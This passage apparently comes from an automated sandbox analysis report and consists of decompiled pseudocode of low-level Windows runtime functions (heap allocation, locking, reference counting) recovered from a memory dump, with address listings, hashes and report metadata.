					if( *0x4a253e8 > 5 && E04978F33(0x4a253e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4a253e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4a253e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x491bc46;
						_t48 = E049B7B9C(0x4a253e8, 0x491bc46, _t67, 0x4a253e8, _t70,  &_v140);
					}
				}
				return E0497B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                  0x04978ec7
                                                                  0x04978ed9
                                                                  0x04978edc
                                                                  0x04978ee6
                                                                  0x04978ee9
                                                                  0x04978eee
                                                                  0x04978efc
                                                                  0x04978f08
                                                                  0x049b1349
                                                                  0x049b1353
                                                                  0x049b135d
                                                                  0x049b1366
                                                                  0x049b136f
                                                                  0x049b1375
                                                                  0x049b137c
                                                                  0x049b1385
                                                                  0x049b1390
                                                                  0x049b1391
                                                                  0x049b139c
                                                                  0x049b139d
                                                                  0x049b13a6
                                                                  0x049b13ac
                                                                  0x049b13b2
                                                                  0x049b13b5
                                                                  0x049b13bc
                                                                  0x049b13bf
                                                                  0x049b13c2
                                                                  0x049b13c5
                                                                  0x049b13c8
                                                                  0x049b13cb
                                                                  0x049b13ce
                                                                  0x049b13d1
                                                                  0x049b13d4
                                                                  0x049b13d7
                                                                  0x049b13da
                                                                  0x049b13dd
                                                                  0x049b13e0
                                                                  0x049b13e3
                                                                  0x049b13e6
                                                                  0x049b13e9
                                                                  0x049b13f6
                                                                  0x049b1400
                                                                  0x049b1400
                                                                  0x04978f08
                                                                  0x04978f32

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6f4ded787504bf9c4f6a57ade4fac032fd97efb09101c6a9de09eaab97268c05
                                                                  • Instruction ID: 53e5d2d21118e76eda159764800a9532f4a2d497afe2ac602c62905b0c406a96
                                                                  • Opcode Fuzzy Hash: 6f4ded787504bf9c4f6a57ade4fac032fd97efb09101c6a9de09eaab97268c05
                                                                  • Instruction Fuzzy Hash: E74191B1D002289EDB20DFAAD981AAEFBF4FB48314F5041AEE549A7240E7746A44CF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04974A2C, Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 58%
                                                                  			E04974A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x4a2d360 ^ _t62;
				_v8 =  *0x4a2d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04952280(_t26, 0x4a28608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0494FFB0(_t41, _t51, 0x4a28608);
						L2:
						 *0x4a2b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0497B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04952280(_t28, 0x4a28608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0494FFB0(_t42, _t53, 0x4a28608);
							if(_t53 != 0) {
								L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0494FFB0(_t41, _t51, 0x4a28608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                  0x04974a2c
                                                                  0x04974a34
                                                                  0x04974a3c
                                                                  0x04974a3e
                                                                  0x04974a48
                                                                  0x04974a4b
                                                                  0x04974a4d
                                                                  0x04974a51
                                                                  0x04974a9c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04974aa3
                                                                  0x04974aa8
                                                                  0x04974aad
                                                                  0x04974ab1
                                                                  0x04974ade
                                                                  0x04974ae3
                                                                  0x04974a5a
                                                                  0x04974a62
                                                                  0x04974a6a
                                                                  0x04974a6e
                                                                  0x049af203
                                                                  0x04974a84
                                                                  0x04974a88
                                                                  0x04974a89
                                                                  0x04974a8a
                                                                  0x04974a95
                                                                  0x04974a95
                                                                  0x04974a79
                                                                  0x04974a80
                                                                  0x04974af2
                                                                  0x04974af4
                                                                  0x04974af9
                                                                  0x04974aff
                                                                  0x04974b01
                                                                  0x04974b03
                                                                  0x04974b08
                                                                  0x049af20a
                                                                  0x049af212
                                                                  0x049af216
                                                                  0x049af216
                                                                  0x04974b08
                                                                  0x04974b13
                                                                  0x04974b1a
                                                                  0x049af229
                                                                  0x049af229
                                                                  0x04974b1a
                                                                  0x04974a82
                                                                  0x00000000
                                                                  0x04974a82
                                                                  0x04974ab7
                                                                  0x04974acd
                                                                  0x04974acd
                                                                  0x04974ad5
                                                                  0x04974ada
                                                                  0x00000000
                                                                  0x04974ada
                                                                  0x04974ac2
                                                                  0x04974acb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04974acb
                                                                  0x04974a53
                                                                  0x04974a53
                                                                  0x04974a58
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 35dff6279d555be0b448b31cccc9e07e2d95819dd0e7ceae5d13bfccd2443da3
                                                                  • Instruction ID: 6dd1ea28fd518afdd719cbce02ea14191b0719359ebf72c6dc05ff2d47046f02
                                                                  • Opcode Fuzzy Hash: 35dff6279d555be0b448b31cccc9e07e2d95819dd0e7ceae5d13bfccd2443da3
                                                                  • Instruction Fuzzy Hash: FF312132241310AFD725EF58CA80B2ABBA9FFC0B14F400979E8560B656D774F900DF9A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496E730, Relevance: .1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 74%
                                                                  			E0496E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04979670() < 0) {
					L0498DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4a27b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04954620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0496E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                  0x0496e730
                                                                  0x0496e736
                                                                  0x0496e738
                                                                  0x0496e73d
                                                                  0x0496e73e
                                                                  0x0496e740
                                                                  0x0496e749
                                                                  0x0496e765
                                                                  0x0496e76a
                                                                  0x0496e76b
                                                                  0x0496e76c
                                                                  0x0496e76d
                                                                  0x0496e76e
                                                                  0x0496e76f
                                                                  0x0496e775
                                                                  0x0496e777
                                                                  0x0496e77e
                                                                  0x049ab675
                                                                  0x0496e784
                                                                  0x0496e784
                                                                  0x0496e789
                                                                  0x0496e7a8
                                                                  0x0496e7ac
                                                                  0x0496e807
                                                                  0x0496e7ae
                                                                  0x0496e7ae
                                                                  0x0496e7b1
                                                                  0x0496e7b4
                                                                  0x0496e7b9
                                                                  0x0496e7c0
                                                                  0x0496e7c4
                                                                  0x0496e7ca
                                                                  0x0496e7cc
                                                                  0x00000000
                                                                  0x0496e7d3
                                                                  0x0496e7d6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496e7ff
                                                                  0x0496e802
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496e7f9
                                                                  0x0496e7fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496e7f3
                                                                  0x0496e7f6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496e7ed
                                                                  0x0496e7f0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496e7e7
                                                                  0x0496e7ea
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049ab685
                                                                  0x049ab688
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049ab682
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496e7cc
                                                                  0x0496e7d9
                                                                  0x0496e7dc
                                                                  0x0496e7de
                                                                  0x0496e7de
                                                                  0x0496e7ac
                                                                  0x0496e7e4
                                                                  0x0496e74b
                                                                  0x0496e751
                                                                  0x0496e759
                                                                  0x0496e761
                                                                  0x0496e761

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d6f70e088c15bec3b808a32d82ca94f49a163ff6ebcf0ed231b618958c5c2d2d
                                                                  • Instruction ID: 1f8db9c9e9fb4723b0d2e892cb1aa1659300ddd2d0c4aaa8c41dc6d54b4c31a9
                                                                  • Opcode Fuzzy Hash: d6f70e088c15bec3b808a32d82ca94f49a163ff6ebcf0ed231b618958c5c2d2d
                                                                  • Instruction Fuzzy Hash: 89318F79A14249EFDB44CF58C840F96B7E8FB58314F14866AF909CB341E631ED90CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496BC2C, Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 67%
                                                                  			E0496BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4a26100; // 0x16
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04952280(0xd, 0x172bf1a0);
				_t41 =  *0x4a260f8; // 0x0
				if(_t41 != 0) {
					 *0x4a260f8 =  *_t41;
					 *0x4a260fc =  *0x4a260fc + 0xffff;
				}
				E0494FFB0(_t41, 0x800, 0x172bf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4a260f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04954620(0x4a26100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4a26100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                  0x0496bc36
                                                                  0x0496bc42
                                                                  0x0496bc45
                                                                  0x0496bc4a
                                                                  0x0496bd35
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496bc50
                                                                  0x0496bc50
                                                                  0x0496bc58
                                                                  0x0496bc5a
                                                                  0x0496bc60
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049aa4f2
                                                                  0x049aa4f6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049aa4fc
                                                                  0x0496bc79
                                                                  0x0496bc7e
                                                                  0x0496bc86
                                                                  0x0496bd16
                                                                  0x0496bd20
                                                                  0x0496bd20
                                                                  0x0496bc8d
                                                                  0x0496bc94
                                                                  0x0496bcbd
                                                                  0x0496bcca
                                                                  0x0496bccb
                                                                  0x0496bccc
                                                                  0x0496bccd
                                                                  0x0496bcce
                                                                  0x0496bcd4
                                                                  0x0496bcea
                                                                  0x0496bcee
                                                                  0x0496bcf2
                                                                  0x0496bd00
                                                                  0x0496bd04
                                                                  0x00000000
                                                                  0x0496bc96
                                                                  0x0496bcab
                                                                  0x0496bcaf
                                                                  0x0496bd2c
                                                                  0x0496bd2c
                                                                  0x0496bd09
                                                                  0x00000000
                                                                  0x0496bd09
                                                                  0x0496bcb1
                                                                  0x0496bcb5
                                                                  0x0496bcbb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496bcbb

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b411b1b60cedbda9c105f118b7d0fe394236a5e7a6bb4ae9a10f759e3a4f1dae
                                                                  • Instruction ID: 8e801ba7d173d45db20c81f4b4a032a0d3141c0ec1a15354df81fd4c1376ed72
                                                                  • Opcode Fuzzy Hash: b411b1b60cedbda9c105f118b7d0fe394236a5e7a6bb4ae9a10f759e3a4f1dae
                                                                  • Instruction Fuzzy Hash: B53101726026669BDB11DF5CC4807A673A4EB28314F104478ED06EF201FB39FE06EB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04961DB5, Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 60%
                                                                  			E04961DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0495F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04954620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0495F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                  0x04961dc2
                                                                  0x04961dc5
                                                                  0x04961dc7
                                                                  0x04961dcc
                                                                  0x04961dce
                                                                  0x04961dd6
                                                                  0x04961ddf
                                                                  0x04961de0
                                                                  0x04961de1
                                                                  0x04961de5
                                                                  0x04961de8
                                                                  0x04961def
                                                                  0x04961df0
                                                                  0x04961df6
                                                                  0x04961df7
                                                                  0x04961dfe
                                                                  0x04961e1a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04961e0b
                                                                  0x04961e12
                                                                  0x04961e12
                                                                  0x04961e00
                                                                  0x04961e00
                                                                  0x04961e05
                                                                  0x04961e1e
                                                                  0x04961e23
                                                                  0x049a570f
                                                                  0x049a5713
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a5719
                                                                  0x049a5719
                                                                  0x04961e2c
                                                                  0x04961e2d
                                                                  0x04961e2e
                                                                  0x04961e2f
                                                                  0x04961e31
                                                                  0x04961e32
                                                                  0x04961e35
                                                                  0x04961e3d
                                                                  0x049a5723
                                                                  0x049a573d
                                                                  0x049a573d
                                                                  0x00000000
                                                                  0x049a5723
                                                                  0x04961e49
                                                                  0x04961e4e
                                                                  0x04961e4e
                                                                  0x04961e09
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                  • Instruction ID: 6360fe66121b0e1b0481d2ac1ee5bb497a1889405b9575358000d7711dcd1498
                                                                  • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                  • Instruction Fuzzy Hash: 3F219F32640118FFD722CF99CC85EAABBBDEF85795F114065E90297220DA30FE11DBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04939100, Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E04939100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4a0f6e8);
				E0498D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04A088F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0498D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4a286c0; // 0x2907b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4a286b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04952280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04A088F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0497AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4a2b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4a284c0;
										if(_t69 >=  *0x4a284c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04A09063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0493922A(_t82);
							_t53 = E04957D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04A08B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4a286c0; // 0x2907b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4a286b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4a286bc;
										_t72 = 0x4a286b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04939240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4a286c4;
									_t72 = 0x4a286c0;
									L18:
									E04969B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                  0x04939100
                                                                  0x04939100
                                                                  0x04939100
                                                                  0x04939100
                                                                  0x04939102
                                                                  0x04939107
                                                                  0x0493910c
                                                                  0x04939110
                                                                  0x04939115
                                                                  0x04939136
                                                                  0x04939143
                                                                  0x049937e4
                                                                  0x049937e4
                                                                  0x04939149
                                                                  0x0493914e
                                                                  0x0493914e
                                                                  0x04939117
                                                                  0x0493911d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0493911f
                                                                  0x04939125
                                                                  0x00000000
                                                                  0x04939151
                                                                  0x04939158
                                                                  0x0493915d
                                                                  0x04939161
                                                                  0x04939168
                                                                  0x04993715
                                                                  0x00000000
                                                                  0x0493916e
                                                                  0x0493916e
                                                                  0x04939175
                                                                  0x04939177
                                                                  0x0493917e
                                                                  0x0493917f
                                                                  0x04939182
                                                                  0x04939182
                                                                  0x04939187
                                                                  0x04939187
                                                                  0x0493918a
                                                                  0x0493918d
                                                                  0x0493918f
                                                                  0x04939192
                                                                  0x04939195
                                                                  0x04939198
                                                                  0x04939198
                                                                  0x04939198
                                                                  0x0493919a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0499371f
                                                                  0x04993721
                                                                  0x04993727
                                                                  0x0499372f
                                                                  0x04993733
                                                                  0x04993735
                                                                  0x04993738
                                                                  0x0499373b
                                                                  0x0499373d
                                                                  0x04993740
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04993746
                                                                  0x04993749
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0499374f
                                                                  0x04993751
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04993757
                                                                  0x04993759
                                                                  0x0499375c
                                                                  0x0499375c
                                                                  0x0499375e
                                                                  0x0499375e
                                                                  0x04993761
                                                                  0x04993764
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04993766
                                                                  0x04993768
                                                                  0x049937a3
                                                                  0x049937a3
                                                                  0x049937a5
                                                                  0x049937a7
